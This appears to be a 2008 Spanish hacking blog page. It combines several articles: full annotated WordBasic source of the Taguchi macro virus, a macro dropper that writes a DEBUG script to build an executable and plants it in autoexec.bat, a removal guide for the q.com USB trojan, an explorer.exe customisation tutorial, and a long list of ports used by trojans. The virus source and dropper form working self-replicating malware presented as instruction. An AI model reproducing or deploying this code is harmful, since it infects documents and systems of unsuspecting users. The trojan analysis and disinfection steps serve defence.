lunes, 13 de octubre de 2008

Macros virulentos. Arquitectura a través de una ventana (II)

Mr. I/O [blackhat4all@gmail.com]

Nota: El autor no se hace responsable del uso que se le pueda dar a esta información. La misma solo ha sido creada con fines educativos.

Anatomía del código intoxicante Taguchi.

  

'*************************************************************
'* *
'* Virus Taguchi *
'* (La probabilidad de aprobar es de un 0.05 %) *
'* *
'*************************************************************
Sub MAIN 'este macro se definirá como autoclose
On Error Goto finalizar
'si hay algún error va a finalizar.
'En este lenguaje hay etiquetas, saltos condicionales, eventos, etc. Nigro1$ = NombreVentana$() + ":autoclose"
Nigro2$ = NombreVentana$() + ":nigro"
Archi$ = LCase$(Right$(NombreArchivoMacro$(NombreMacro$(0)), 10))
'utilizo la función Lcase (Lowercase = minúsculas ) para realizar la comparación
'solo en minúsculas y en Archi$ tendrá‚ el nombre del archivo que contenga el macro
'ya sea un archivo de plantilla o el normal.dot 'utilizo la función right$ porque nombrearchivomacro$ devuelve el nombre con la ruta
If archi$ = "normal.dot" Then
'si se ejecuta desde el normal.dot
If infectado = 0 Then
Goto contadoc
'si no lo esta salta a contadoc para infestar el archivo activo
Else
Goto finalizar
'si lo esta salta a finalizar y no lo infesta – pues ya lo está
EndIf
Else
'se ejecuta desde un archivo
If infectado = 0 Then
Goto contanormal
'salta hasta la etiqueta e infesta normal.dot si no lo esta
Else
Goto finalizar
'no infesta porque ya está infestado y se ahorra tiempo
EndIf
EndIf
'observen la estructura del lenguaje, la claridad de su creación.
Goto finalizar
MsgBox "virus Taguchi"
'— este es el conjunto de instrucciones de contaminación del fichero
contadoc:
'etiqueta a donde se realiza el salto para contaminar archivo abierto
ArchivoGuardarComo.Formato = 1 'se condiciona que el archivo se salve como plantilla
MacroCopiar "global:autoclose", nigro1$, 1
MacroCopiar "global:nigro", nigro2$, 1
ArchivoGuardarTodo 1, 1
Goto finalizar
'— este es el conjunto de instrucciones de contaminación del archivo normal
contanormal: 'contamina el normal.dot
MacroCopiar nigro1$, "global:autoclose", 1
MacroCopiar nigro2$, "global:nigro", 1
ArchivoGuardarTodo 1, 0
Goto finalizar
'— este es el conjunto de instrucciones de finalizar
finalizar:
Call Nigro
'se hace payload, se realiza otra macrollamada.
End Sub

'Aquí vemos como también existen funciones,
'esta función es definida dentro de la ventana del
'macro autoclose ya que es llamada desde dicha macro Function infectado
'función que verifica si está infestado ya sea un archivo o
'el normal.dot según el 'caso devuelve 0 si limpio y 1 si infectado
infectado = 0
Archi$ = LCase$(Right$(NombreArchivoMacro$(NombreMacro$(0)), 10))
'busca entre los macros si está el macro nigro, si está es que esta contaminado
If archi$ = "normal.dot" Then
If ContarMacros(1) > 0 Then
For i = 1 To ContarMacros(1)
If NombreMacro$(i, 1) = "nigro" Then
infectado = 1
End If
Next i
End If
Else
If ContarMacros(0) > 0 Then
For i = 1 To ContarMacros(0)
If NombreMacro$(i, 0) = "nigro" Then
infectado = 1
End If
Next i
End If
End If
End Function

Sub MAIN
'este procedimiento se define como nigro
If Día(Ahora()) = 19 And Mes(Ahora()) = 2 Then
Insertar " * tAgUchI vIrUz * by NIGROMANTE(nEUrOtIc cpU) 1997"
Goto bucle
'si es el día 19 de Febrero creo un bucle infinito
'escribiendo en el archivo abierto nEUrOtIc cpU
End If
End Sub

Ilustración de la morbilidad

La mayoría de estas funciones son fáciles de entender si seguimos el nombre. No obstante creo sería importante verificar el procedimiento seguido para el contaminado de los archivos.

Primeramente el virus guarda en archi$() el nombre del archivo desde que parte la contaminación – nótese que esta función devuelve un valor tipo texto (posee un símbolo $) –.

El nombre del archivo lo obtiene mediante la función:
nombrearchivomacro$().

Ahora teniendo ese nombre compara archi$ con "normal.dot" para saber si el virus se está ejecutando – el macro – desde un archivo o desde el normal.dot. De estarse ejecutando desde el normal.dot se vuelve redundante contaminarlo, por ello – primeramente – se chequea si está contaminado mediante la función infectado, si no lo está lo contamina y si lo está se invoca a la macro nigro para realizar el payload. En el caso en que se ejecute desde un archivo se hace lo contrario mediante la función infectado.

Se revisa si el archivo normal.dot está contaminado, en caso positivo se invoca al macro nigro, en caso contrario se contamina. Por ello es fácil de entender que la función infectado trabaja de diferente manera según se ejecute, desde un archivo o desde el normal.dot.

Si se ejecuta desde un archivo
    infectado=1 si normal.dot infectado
    infectado=0 si normal.dot no infectado

Si se ejecuta desde el normal.dot
    infectado=1 si archivo infectado
    infectado=0 si archivo no infectado

El chequeo de la infección – ya sea el archivo o el normal.dot – se hará mediante las funciones contarmacros(1) que devuelve el número de macros en el archivo activo y contarmacros(0) que devuelve el número de macros en normal.dot

nombremacro$(n,1) devuelve el nombre del macro número n dentro del archivo activo
nombremacro$(n,0) devuelve el nombre del macro número n dentro del normal.dot

El recorrido por todos los nombres de macros se realiza mediante un bucle – recuerden que esto es un lenguaje de alto nivel.

For i = 1 To ContarMacros(1)
If NombreMacro$(i, 1) = "nigro" Then
infectado = 1
End If
Next i
Con esto se busca la macro de nombre "nigro" dentro de un archivo, si la encuentra entonces infectado – como bandera – toma el valor 1. En caso contrario infectado tendrá el valor con el que fue inicializado es decir 0.
Otros comandos de interés para los arquitectos de virus en la etapa de payload serían por ejemplo shell "comando" con el que puedes ejecutar programas del sistema operativo. Este comando shell es muy interesante para hacer llamadas al programa debug del dos con código hexadecimal y crear carriers ejecutables de virus como en el caso del Ph33r.

Insertar "lo que se quiera insertar" permite insertar texto en el documento activo
msgbox "virus activado" aparece un cuadro de diálogo que muestra este mensaje y este desaparece cuando se aprieta el botón 'aceptar'.

Ilustraremos esta otra modalidad de infección que resulta interesante y muy poderosa, que es la de convertir a los virus de macros en hospederos de otros virus que afectan a otros archivos – .com, .exe, .bat –, esto se logra a partir de incluir dentro de la plantilla otro virus, ya sea de ejecutable o de arranque, al poderse ejecutar programas, pues lo que lleva el documento es un script. de DEBUG.

Comúnmente realizan esta infección utilizando la orden "E" que, permite cambiar bytes de posiciones de memoria:

Open "c:\dos\script.dbg" For Output As #1
Print #1, "N virus.exe"
Print #1, "E 0100 4D 5A EC 00 0C 00 00 00 20 00 00 00 FF FF 00 00"
Print #1, "E 0110 00 00 32 2D 00 00 01 00 1E 00 00 00 01 00 00 00"
Print #1, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
'etc, etc, etc,
Print #1, "E 14F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1500 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "RCX"
Print #1, "1500"
Print #1, "W"
Print #1, "Q"
Print #1, ""
Close #1

Open "c:\dos\infecta.bat" For Output As #1
Print #1, "@echo off"
Print #1, "debug < script.dbg > nul"
Print #1, "echo @c:\dos\virus.exe>>c:\autoexec.bat"
Print #1, "del c:\dos\script.dbg"
Print #1, "del c:\dos\infecta.bat"
Close #1
ChDir "C:\DOS"
Shell "INFECTA.BAT", 0
ChDir "C:\"

Apocalipsis

Aquí concluye este artículo, con él la explicación de cómo funciona un virus macro sencillo, y algunas técnicas de ataque e infección, pudiéndose apreciar, a pesar de lo simple de su programación, lo nocivo que puede ser su ataque, y lo volátil de su infección. Por ello es menester tomar las medidas de seguridad que nos permitan protegernos de esta chusma de virus. Y por ende, de las variantes más agresivas, con técnicas destructivas más poderosa, de autoprotección más brillantes, y formas más ingeniosas de propagación. Esperando que con él muchas respuestas se hayan vertido sobre las cabezas de la comunidad, al igual que muchas nuevas dudas hayan anidado en mentes más suspicaces.

Continuar leyendo

Virus q.com

Alien [blackhat4all@gmail.com]

Que hace

Este es un virus de los que podemos llamar común, los que utilizan las memorias flash como medios de reproducción y el registro como zona de carga.

Al instalarse en el sistema lo primero que hace es activar la opción de ocultar archivos y carpetas ocultos, luego crea en todas las raíces de las unidades un archivo de nombre q.com junto con un autorun.inf, estando este último ofuscado.

Estos archivos son los encargados de, cada vez que se haga doble clic en las unidades infestadas, volver a infestar todo el sistema en caso que ya no lo esté. Igualmente el archivo guarda dos módulos en C:\windows\system32 con los nombres de amvo0.dll y amvo.exe y otro en C:\Documents and Settings\usuario\Configuración local\Temp denominado cmctva4c.dll.

De estos archivos, el .exe es el encargado de ejecutarse en cada inicio de sesión y es cargado mediante el registro por la clave: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\amva

Como tal es considerado un troyano cuyos picos de actividad ocurren cada 30 segundos (como se muestra en la gráfica)

Imagen del trabajo del procesador

Vulnerabilidades

Una de las vulnerabilidades que puede tener es que se ocupa de esconder todos los archivos y carpetas de la raíz de las unidades pero deja totalmente desprotegidos a los que están en C:\windows\system32, permitiendo con esto que una ves que se logre quitar los atributos de oculto y sistema a todos los archivos de dicho directorio, los archivos que a el correspondan y se encuentren en dicha dirección quedarán totalmente desprotegidos.

También lleva en contra el hecho de que se carga mediante el registro y utilizando la misma dirección de carga que la de otros tantos virus y que, por lo general, no asegura su estancia en el sistema.

Al parecer es una variante del Kavo.exe y si no lo es, pues se comporta de forma muy similar, creando en el directorio de carga un archivo de mismo nombre con el solo cambio de la colocación de un 0 y la extensión.

Esto como tal demuestra una vez más que los virus (al menos los nacionales) aún siguen llevándose todo por el mismo patrón o en su defecto, se sigue utilizando el mismo programa para la creación de los mismos.

Desinfección

Para desinfectar el sistema de este “virus” solo es necesario abrir el registro en la dirección de carga y eliminar la clave que contiene al virus, luego dirigirse a todas las unidades (mediante la consola preferiblemente) y eliminar los archivos autorun.inf y q.com, luego en C:\windows\sygstem32 eliminar avmo.exe y avmo0.dll y por último borrar en C:\Documents and Settings\usuario\Configuración local\Temp el archivo cmctva4c.dll

Nota: En algunas máquinas puede provocar un error en el inicio del sistema.
Nota: Aún no ha sido detectado por Segurmatica.

Continuar leyendo

Controla XP (III)

Thunder [yuniet02015@hab.jovenclub.cu]

Antes de nada un salu2 a to2s los que siguen esta revista y este tema. Bueno, nada, aquí estamos en otro número de los artículos “Controlando Totalmente XP”. Espero que les halla gustado lo que le hicimos a la calculadora de Windows y….hayan experimentado con algo mas…jeje.


Como les había dicho en la anterior entrega, vamos a ver otra aplicación antes de entrar en la pantalla de inicio y apagado de Windows XP. Ya se que hay muchos programas que con un par de clic te cambian todo esto de las pantallas de XP y algunas de las demás cosas y configuraciones….pero bueno, no nos debemos conformar con que “alguien lo haga todo”, si realmente nos gusta encontrar el “Kit” de las cosas, el hacerlas “a mano”, y no solo quedarnos con el….como lo hará??? Aun si somos de los que no nos interesa como es que se hacen las cosas, sino que se hagan, pues esta serie de artículos no están escritos para ti….lo siento, mejor sigue trabajando con el TuneUp y el StyleXP y no pases trabajo en leer esto. De lo contrario, si te gusta ir al “meollo” de las cosas y en busca del “porque”, bienvenido una vez mas.

En esta ocasión vamos a hacernos cargo de otra aplicación, como les había dicho, una aplicación famosísima, una aplicación que, dadas mis capacidades de adivinación, estoy seguro que todos los que tenemos WinXp la utilizamos, me refiero a: “El Explorador de Windows”, vieron que grandes mis poderes psíquicos…jeje

Bueno, vamos a hacer otra de nuestras hazañas de configuración en nuestro sistema con la edición, al igual que con la calculadora, del explorador de windows. Y que le vamos a hacer ahora al pobre?, se preguntaran muchos….no lo vamos a pintoretear, igual que a la calculadora no??? No, este no es el objetivo….y no por falta de pintura…jeje. Vamos, en esta ocasión, a cambiar la palabra Inicio del botón de inicio y…bueno, lo otro queda por ustedes.
Menú inicio semi modificado

Basta de teque y manos a la obra:

1.- Ve a \Windows\explorer.exe y haz una copia de él en nuestra carpeta, por ejemplo explorer2.exe

2.
- En el ResHack abre el archivo que has copiado. File / Open / \Windows\explorer2.exe

3.
- Ve a la clave String Table y mira los números
37/3082
38/3082


4.
- Encontrarás la palabra "Inicio", la cambias, pero no te excedas con la cantidad de letras con seis, siete letras o menos estamos.

5.- Si te sale un mensaje de Compile le das a Aceptar. O pulsa el botón "Compile Script".

6.
- Guardar: File/Save

7.- Ahora cogemos nuestra copia Explorer2.exe y lo copiamos en \Windows\, junto con el Explorer original, ojo….no sobrescribirlo, simplemente copiarlo junto al original Explorer.exe.

8.- En Windows ve a Inicio / Ejecutar / regedit

9.- Ve a la clave:
HKEY_LOCAL_MACHINE/Software/Microsoft/WindowsNT/CurrentVersion/Winlogon
En el Panel derecho busca Shell, dale doble clic y cambia Explorer.exe por Explorer2.exe
Nota: Aunque los artículos se llaman “Controlando Totalmente XP” y no “Controlando Totalmente 98” , pues me da un poco de sentimiento y….bueno, pues que para los que no tienen XP y tienen en su cacharrito el Win 98, aquí les va un apéndice.

=========================================================
        Si tienes Windows 98:
        Inicio/Ejecutar/msconfig
        Ficha--> System.ini
        + boot/Shell ------->(Modificar)=Explorer2.exe
=========================================================

9.- Reinicia.
Guala!!!!

Ahora tenemos nuestro texto en vez del viejo y anticuado “Inicio”…jeje

Nota: Si quieres dejarlo como estaba (no creo que quieras, pero bueno….para gustos los colores) en el paso 8 vuelve a poner Explorer.exe y listo, como si nada hubiera ocurrido.

Cambiar la “pesada” imagen a la izquierda del botón inicio:

-En Bitmap/143 está el dibujito que tenemos a la izquierda de la palabra Inicio, o sea, la banderita....nada que si queremos poner otra imagen….

1.-Le damos clic derecho y le decimos “Save bitmap”, y lo guardamos en nuestra carpeta.

2.-Cogemos esta imagen que hemos guardado y la abrimos con un editor de imágenes y la cambiamos como deseemos, igual si queremos poner otra tiene que ser idéntica a esta, de las mismas proporciones, profundidad de color, extensión,etc…o sea que les recomiendo que la abran y después, encima de ella, pongan otra imagen y hagan lo que vallan a hacer, luego le dan salvar y listo.

3.-Vamos a Bitmap/143 nuevamente, pero esta vez le decimos: “Replace Resource….”, buscamos nuestra nueva imagen y le damos OK.

4.-De aquí en adelante podemos seguir con el paso 6 y…

Menú inicio totalmente modificado

Cabe aclarar que la nueva imagen siempre tomara la forma de la banderita…así que….veamos que hacemos.

* Si Borramos el String Table 37 y 38 y el Bitmap 143, tendremos un botón de inicio pequeño de color verde. Para ello nos posicionamos en String Table 37 - 3082 y con el botón derecho Delete Resource lo borramos, lo mismo para los demás String 38 y para Bitmap 143, compilamos y guardamos.

Si quieres cambiar las opciones del menú del botón de inicio, también puedes ir a la clave:
HKEY_CURRENT_USER/Software/Micorosoft/Windows/ShellNoRoam/MUICache y en el Panel derecho modificar las opciones.

Bueno, esto es todo por ahora, como les he dicho, investiguen y no se queden solo con lo que aquí se expone, recuerden que los límites a nuestros conocimientos los ponemos nosotros mismos.

En la próxima entrega hablaremos ya de las pantallas de inicio y apagado de Windows XP y como configurarlas a nuestro antojo. (Aquí si que vamos a pintoretear…jaja) Hasta la próxima

.

Continuar leyendo

Troyano Fisgón (I)

Adrian Cepero [yimaras@yahoo.es]

Concertadas labores de sufragio internauta contraen forzoso socorro y dilucidación, milenios de gracias le sean procurados a la red de redes.


Troyano (Back Orífice, Netbus o Deep Troaht): Fraccionan se en dos crecidas unidades, Cliente- Servidor, úsense para transgredir la privacidad del usuario, sustrayéndole propios datos.

Puerto: Coexisten más de 65000 de puertos desiguales (65535), usados para conexiones de Red, emplean se genéricamente:

20+21 - FTP (file transfer)
22 - SSH (secure remote access)
23 - telnet (remote access) and also Wingates (special kind of proxies)
25 - SMTP (send email)
53 - DNS (resolves an URL to an IP)
80 - HTTP (normal web browsing) and also a proxy
110 - POP3 (receive email)
443 - SSL (secure HTTPS connections)
1080 - Socks proxy
3128 - Squid proxy
8000 - Junkbuster proxy
8080 - a proxy

Relación de Puertos esgrimidos por Troyanos

puerto 1 (UDP) - Sockets des Troie
puerto 2 Death
puerto 15 B2
puerto 20 Senna Spy FTP server
puerto 21 Back Construction, Blade Runner, Cattivik FTP Server, CC Invader, Dark FTP, Doly Trojan, Fore, FreddyK, Invisible FTP, Juggernaut 42, Larva, MotIv FTP, Net Administrator, Ramen, RTB 666, Senna Spy FTP server, The Flu, Traitor 21, WebEx, WinCrash
puerto 22 Adore sshd, Shaft
puerto 23 ADM worm, Fire HacKer, My Very Own trojan, RTB 666, Telnet Pro, Tiny Telnet Server - TTS, Truva Atl
puerto 25 Ajan, Antigen, Barok, BSE, Email Password Sender - EPS, EPS II, Gip, Gris, Happy99, Hpteam mail, Hybris, I love you, Kuang2, Magic Horse, MBT (Mail Bombing Trojan), Moscow Email trojan, Naebi, NewApt worm, ProMail trojan, Shtirlitz, Stealth, Stukach, Tapiras, Terminator, WinPC, WinSpy
puerto 30 Agent 40421
puerto 31 Agent 31, Hackers Paradise, Masters Paradise
puerto 39 SubSARI
puerto 41 Deep Throat, Foreplay
puerto 44 Arctic
puerto 48 DRAT
puerto 50 DRAT
puerto 53 ADM worm, Lion
puerto 58 DMSetup
puerto 59 DMSetup
puerto 69 BackGate
puerto 79 CDK, Firehotcker
puerto 80 711 trojan (Seven Eleven), AckCmd, Back End, Back Orifice 2000 Plug-Ins, Cafeini, CGI Backdoor, Executor, God Message, God Message 4 Creator, Hooker, IISworm, MTX, NCX, Noob, Ramen, Reverse WWW Tunnel Backdoor, RingZero, RTB 666, Seeker, WAN Remote, Web Server CT, WebDownloader
puerto 81 RemoConChubo
puerto 99 Hidden
puerto, Mandragore, NCX
puerto 110 ProMail trojan
puerto 113 Invisible Identd Deamon, Kazimas
puerto 119 Happy99
puerto 121 Attack Bot, God Message, JammerKillah
puerto 123 Net Controller
puerto 133 Farnaz
puerto 137 Chode
puerto 137 (UDP) - Msinit, Qaz
puerto 138 Chode
puerto 139 Chode, God Message worm, Msinit, Netlog, Network, Qaz, Sadmind, SMB Relay
puerto 142 NetTaxi
puerto 146 Infector
puerto 146 (UDP) - Infector
puerto 166 NokNok
puerto 170 A-trojan
puerto 334 Backage
puerto 411 Backage
puerto 420 Breach, Incognito
puerto 421 TCP Wrappers trojan
puerto 455 Fatal Connections
puerto 456 Hackers Paradise
puerto 511 T0rn Rootkit
puerto 513 Grlogin
puerto 514 RPC Backdoor
puerto 515 lpdw0rm, Ramen
puerto 531 Net666, Rasmin
puerto 555 711 trojan (Seven Eleven), Ini-Killer, Net Administrator, Phase Zero, Phase-0, Stealth Spy
puerto 600 Sadmind
puerto 605 Secret Service
puerto 661 NokNok
puerto 666 Attack FTP, Back Construction, BLA trojan, Cain & Abel, lpdw0rm, NokNok, Satans Back Door - SBD, ServU, Shadow Phyre, th3r1pp3rz (= Therippers)
puerto 667 SniperNet
puerto 668 th3r1pp3rz (= Therippers)
puerto 669 DP trojan
puerto 692 GayOL
puerto 777 AimSpy, Undetected
puerto 808 WinHole
puerto 911 Dark Shadow, Dark Shadow
puerto 999 Chat power, Deep Throat, Foreplay, WinSatan
puerto 1000 Connecter, Der Späher / Der Spaeher, Direct Connection
puerto 1001 Der Späher / Der Spaeher, Le Guardien, Silencer, Theef, WebEx
puerto 1005 Theef
puerto 1008 Lion
puerto 1010 Doly Trojan
puerto 1011 Doly Trojan
puerto 1012 Doly Trojan
puerto 1015 Doly Trojan
puerto 1016 Doly Trojan
puerto 1020 Vampire
puerto 1024 Jade, Latinus, NetSpy, Remote Administration Tool - RAT [no 2]
puerto 1025 Fraggle Rock, md5 Backdoor, NetSpy, Remote Storm
puerto 1025 (UDP) - Remote Storm
puerto 1031 Xanadu
puerto 1035 Multidropper
puerto 1042 BLA trojan
puerto 1042 (UDP) - BLA trojan
puerto 1045 Rasmin
puerto 1049 /sbin/initd
puerto 1050 MiniCommand
puerto 1053 The Thief
puerto 1054 AckCmd
puerto 1080 SubSeven 2.2, WinHole
puerto 1081 WinHole
puerto 1082 WinHole
puerto 1083 WinHole
puerto 1090 Xtreme
puerto 1095 Remote Administration Tool - RAT
puerto 1097 Remote Administration Tool - RAT
puerto 1098 Remote Administration Tool - RAT
puerto 1099 Blood Fest Evolution, Remote Administration Tool - RAT
puerto 1104 (UDP) - RexxRave
puerto 1150 Orion
puerto 1151 Orion
puerto 1170 Psyber Stream Server - PSS, Streaming Audio Server, Voice
puerto 1174 DaCryptic
puerto 1180 Unin68
puerto 1200 (UDP) - NoBackO
puerto 1201 (UDP) - NoBackO
puerto 1207 SoftWAR
puerto 1208 Infector
puerto 1212 Kaos
puerto 1234 SubSeven Java client, Ultors Trojan
puerto 1243 BackDoor-G, SubSeven, SubSeven Apocalypse, Tiles
puerto 1245 VooDoo Doll
puerto 1255 Scarab
puerto 1256 Project nEXT, RexxRave
puerto 1269 Matrix
puerto 1272 The Matrix
puerto 1313 NETrojan
puerto 1337 Shadyshell
puerto 1338 Millennium Worm
puerto 1349 Bo dll
puerto 1386 Dagger
puerto 1394 GoFriller
puerto 1441 Remote Storm
puerto 1492 FTP99CMP
puerto 1524 Trinoo
puerto 1568 Remote Hack
puerto 1600 Direct Connection, Shivka-Burka
puerto 1703 Exploiter
puerto 1777 Scarab
puerto 1807 SpySender
puerto 1826 Glacier
puerto 1966 Fake FTP
puerto 1967 For Your Eyes Only - FYEO, WM FTP Server
puerto 1969 OpC BO
puerto 1981 Bowl, Shockrave
puerto 1991 PitFall
puerto 1999 Back Door, SubSeven, TransScout
puerto 2000 Der Späher / Der Spaeher, Insane Network, Last 2000, Remote Explorer 2000, Senna Spy Trojan Generator
puerto 2001 Der Späher / Der Spaeher, Trojan Cow
puerto 2023 Ripper Pro
puerto 2080 WinHole
puerto 2115 Bugs
puerto 2130 (UDP) - Mini Backlash
puerto 2140 The Invasor
puerto 2140 (UDP) - Deep Throat, Foreplay
puerto 2155 Illusion Mailer
puerto 2255 Nirvana
puerto 2283 Hvl RAT
puerto 2300 Xplorer
puerto 2311 Studio 54
puerto 2330 IRC Contact
puerto 2331 IRC Contact
puerto 2332 IRC Contact
puerto 2333 IRC Contact
puerto 2334 IRC Contact
puerto 2335 IRC Contact
puerto 2336 IRC Contact
puerto 2337 IRC Contact
puerto 2338 IRC Contact
puerto 2339 IRC Contact, Voice Spy
puerto 2339 (UDP) - Voice Spy
puerto 2345 Doly Trojan
puerto 2400
puertod
puerto 2555 Lion, T0rn Rootkit
puerto 2565 Striker trojan
puerto 2583 WinCrash
puerto 2589 Dagger
puerto 2600 Digital RootBeer
puerto 2702 Black Diver
puerto 2716 The Prayer
puerto 2773 SubSeven, SubSeven 2.1 Gold
puerto 2774 SubSeven, SubSeven 2.1 Gold
puerto 2801 Phineas Phucker
puerto 2929 Konik
puerto 2989 (UDP) - Remote Administration Tool - RAT
puerto 3000 InetSpy, Remote Shut
puerto 3024 WinCrash
puerto 3031 Microspy
puerto 3128 Reverse WWW Tunnel Backdoor, RingZero
puerto 3129 Masters Paradise
puerto 3131 SubSARI
puerto 3150 The Invasor
puerto 3150 (UDP) - Deep Throat, Foreplay, Mini Backlash
puerto 3456 Terror trojan
puerto 3459 Eclipse 2000, Sanctuary
puerto 3700
puertoal of Doom
puerto 3777 PsychWard
puerto 3791 Total Solar Eclypse
puerto 3801 Total Solar Eclypse
puerto 4000 Connect-Back Backdoor, SkyDance
puerto 4092 WinCrash
puerto 4201 War trojan
puerto 4242 Virtual Hacking Machine - VHM
puerto 4321 BoBo
puerto 4444 CrackDown, Prosiak, Swift Remote
puerto 4488 Event Horizon
puerto 4523 Celine
puerto 4545 Internal Revise
puerto 4567 File Nail
puerto 4590 ICQ Trojan
puerto 4653 Cero
puerto 4666 Mneah
puerto 4950 ICQ Trogen (Lm)
puerto 5000 Back Door Setup, BioNet Lite, Blazer5, Bubbel, ICKiller, Ra1d, Sockets des Troie
puerto 5001 Back Door Setup, Sockets des Troie
puerto 5002 cd00r, Linux Rootkit IV (4), Shaft
puerto 5005 Aladino
puerto 5010 Solo
puerto 5011 One of the Last Trojans - OOTLT, One of the Last Trojans - OOTLT, modified
puerto 5025 WM Remote KeyLogger
puerto 5031 Net Metropolitan
puerto 5032 Net Metropolitan
puerto 5321 Firehotcker
puerto 5333 Backage, NetDemon
puerto 5343 WC Remote Administration Tool - wCrat
puerto 5400 Back Construction, Blade Runner
puerto 5401 Back Construction, Blade Runner, Mneah
puerto 5402 Back Construction, Blade Runner, Mneah
puerto 5512 Illusion Mailer
puerto 5534 The Flu
puerto 5550 Xtcp
puerto 5555 ServeMe
puerto 5556 BO Facil
puerto 5557 BO Facil
puerto 5569 Robo-Hack
puerto 5637 PC Crasher
puerto 5638 PC Crasher
puerto 5742 WinCrash
puerto 5760
puertomap Remote Root Linux Exploit
puerto 5802 Y3K RAT
puerto 5873 SubSeven 2.2
puerto 5880 Y3K RAT
puerto 5882 Y3K RAT
puerto 5882 (UDP) - Y3K RAT
puerto 5888 Y3K RAT
puerto 5888 (UDP) - Y3K RAT
puerto 5889 Y3K RAT
puerto 6000 The Thing
puerto 6006 Bad Blood
puerto 6272 Secret Service
puerto 6400 The Thing
puerto 6661 TEMan, Weia-Meia
puerto 6666 Dark Connection Inside, NetBus worm
puerto 6667 Dark FTP, EGO, Maniac rootkit, Moses, ScheduleAgent, SubSeven, Subseven 2.1.4 DefCon 8, The Thing (modified), Trinity, WinSatan
puerto 6669 Host Control, Vampire
puerto 6670 BackWeb Server, Deep Throat, Foreplay, WinNuke eXtreame
puerto 6711 BackDoor-G, SubSARI, SubSeven, VP Killer
puerto 6712 Funny trojan, SubSeven
puerto 6713 SubSeven
puerto 6723 Mstream
puerto 6767 UandMe
puerto 6771 Deep Throat, Foreplay
puerto 6776 2000 Cracks, BackDoor-G, SubSeven, VP Killer
puerto 6838 (UDP) - Mstream
puerto 6883 Delta Source DarkStar (??)
puerto 6912 Shit Heep
puerto 6939 Indoctrination
puerto 6969 2000 Cracks, Danton, GateCrasher, IRC 3, Net Controller, Priority
puerto 6970 GateCrasher
puerto 7000 Exploit Translation Server, Kazimas, Remote Grab, SubSeven, SubSeven 2.1 Gold
puerto 7001 Freak88, Freak2k, NetSnooper Gold
puerto 7158 Lohoboyshik
puerto 7215 SubSeven, SubSeven 2.1 Gold
puerto 7300 NetMonitor
puerto 7301 NetMonitor
puerto 7306 NetMonitor
puerto 7307 NetMonitor, Remote Process Monitor
puerto 7308 NetMonitor, X Spy
puerto 7424 Host Control
puerto 7424 (UDP) - Host Control

puerto 7597 Qaz

Troyano Fisgón Parte 2(Básico)
Relación de Puertos esgrimidos por Troyanos
puerto 7626 Binghe, Glacier, Hyne
puerto 7718 Glacier
puerto 7777 God Message, The Thing (modified), Tini
puerto 7789 Back Door Setup, ICKiller, Mozilla
puerto 7826 Oblivion
puerto 7891 The ReVeNgEr
puerto 7983 Mstream
puerto 8080 Brown Orifice, Generic backdoor, RemoConChubo, Reverse WWW Tunnel Backdoor, RingZero
puerto 8685 Unin68
puerto 8787 Back Orifice 2000
puerto 8812 FraggleRock Lite
puerto 8988 BacHack
puerto 8989 Rcon, Recon, Xcon
puerto 9000 Netministrator
puerto 9325 (UDP) - Mstream
puerto 9400 InCommand
puerto 9870 Remote Computer Control Center
puerto 9872
puertoal of Doom
puerto 9873
puertoal of Doom
puerto 9874
puertoal of Doom
puerto 9875
puertoal of Doom
puerto 9876 Cyber Attacker, Rux
puerto 9878 TransScout
puerto 9989 Ini-Killer
puerto 9999 The Prayer
puerto 10000 OpwinTRojan
puerto 10005 OpwinTRojan
puerto 10008 Cheese worm, Lion
puerto 10067 (UDP) -
puertoal of Doom
puerto 10085 Syphillis
puerto 10086 Syphillis
puerto 10100 Control Total, GiFt trojan
puerto 10101 BrainSpy, Silencer
puerto 10167 (UDP) -
puertoal of Doom
puerto 10520 Acid Shivers
puerto 10528 Host Control
puerto 10607 Coma
puerto 10666 (UDP) - Ambush
puerto 11000 Senna Spy Trojan Generator
puerto 11050 Host Control
puerto 11051 Host Control
puerto 11223 Progenic trojan, Secret Agent
puerto 11831 Latinus
puerto 12076 Gjamer
puerto 12223 Hack´99 KeyLogger
puerto 12310 PreCursor
puerto 12345 Adore sshd, Ashley, cron / crontab, Fat Bitch trojan, GabanBus, icmp_client.c, icmp_pipe.c, Mypic, NetBus, NetBus Toy, NetBus worm, Pie Bill Gates, ValvNet, Whack Job, X-bill
puerto 12346 Fat Bitch trojan, GabanBus, NetBus, X-bill
puerto 12348 BioNet
puerto 12349 BioNet, Webhead
puerto 12361 Whack-a-mole
puerto 12362 Whack-a-mole
puerto 12363 Whack-a-mole
puerto 12623 (UDP) - DUN Control
puerto 12624 ButtMan
puerto 12631 Whack Job
puerto 12754 Mstream
puerto 13000 Senna Spy Trojan Generator, Senna Spy Trojan Generator
puerto 13010 BitchController, Hacker Brasil - HBR
puerto 13013 PsychWard
puerto 13014 PsychWard
puerto 13223 Hack´99 KeyLogger
puerto 13473 Chupacabra
puerto 14500 PC Invader
puerto 14501 PC Invader
puerto 14502 PC Invader
puerto 14503 PC Invader
puerto 15000 NetDemon
puerto 15092 Host Control
puerto 15104 Mstream
puerto 15382 SubZero
puerto 15858 CDK
puerto 16484 Mosucker
puerto 16660 Stacheldraht
puerto 16772 ICQ Revenge
puerto 16959 SubSeven, Subseven 2.1.4 DefCon 8
puerto 16969 Priority
puerto 17166 Mosaic
puerto 17300 Kuang2 the virus
puerto 17449 Kid Terror
puerto 17499 CrazzyNet
puerto 17500 CrazzyNet
puerto 17569 Infector
puerto 17593 AudioDoor
puerto 17777 Nephron
puerto 18667 Knark
puerto 18753 (UDP) - Shaft
puerto 19864 ICQ Revenge
puerto 20000 Millenium
puerto 20001 Insect, Millenium, Millenium (Lm)
puerto 20002 AcidkoR
puerto 20005 Mosucker
puerto 20023 VP Killer
puerto 20034 NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, NetRex, Whack Job
puerto 20203 Chupacabra
puerto 20331 BLA trojan
puerto 20432 Shaft
puerto 20433 (UDP) - Shaft
puerto 21544 GirlFriend, Kid Terror, Matrix
puerto 21554 Exploiter, FreddyK, Kid Terror, Schwindler, Winsp00fer
puerto 21579 Breach
puerto 21957 Latinus
puerto 22222 Donald Dick, Prosiak, Ruler, RUX The TIc.K
